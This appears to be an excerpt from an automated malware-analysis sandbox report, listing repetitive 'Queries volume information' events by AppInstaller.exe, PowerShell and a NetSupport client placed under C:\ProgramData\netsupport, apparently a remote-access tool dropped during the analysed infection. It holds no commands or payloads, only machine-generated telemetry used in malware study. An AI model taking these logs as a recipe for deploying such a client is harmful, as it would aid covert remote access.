Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Queries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\LocalCache\WSJ_4.12.77.0_x64__v3spfewvfazpe{10030ca7-2d34-4b5d-ab65-42a8a50302a9}_temp.pri VolumeInformation	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Activities\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Activities.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Workflow.ServiceCore\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Workflow.ServiceCore.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities\v4.0_4.0.0.0__31bf3856ad364e35\System.Activities.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities.Presentation\v4.0_4.0.0.0__31bf3856ad364e35\System.Activities.Presentation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ScheduledJob\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ScheduledJob.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WSMan.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\netsupport VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.3208.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\netsupport\client\client32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\netsupport\client\client32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\netsupport\client\client32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\LocalCache\WSJ_4.12.77.0_x64__v3spfewvfazpe{cc5f9d8b-94e7-4e6d-8d7d-70b7a8e2a015}_temp.pri VolumeInformation
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
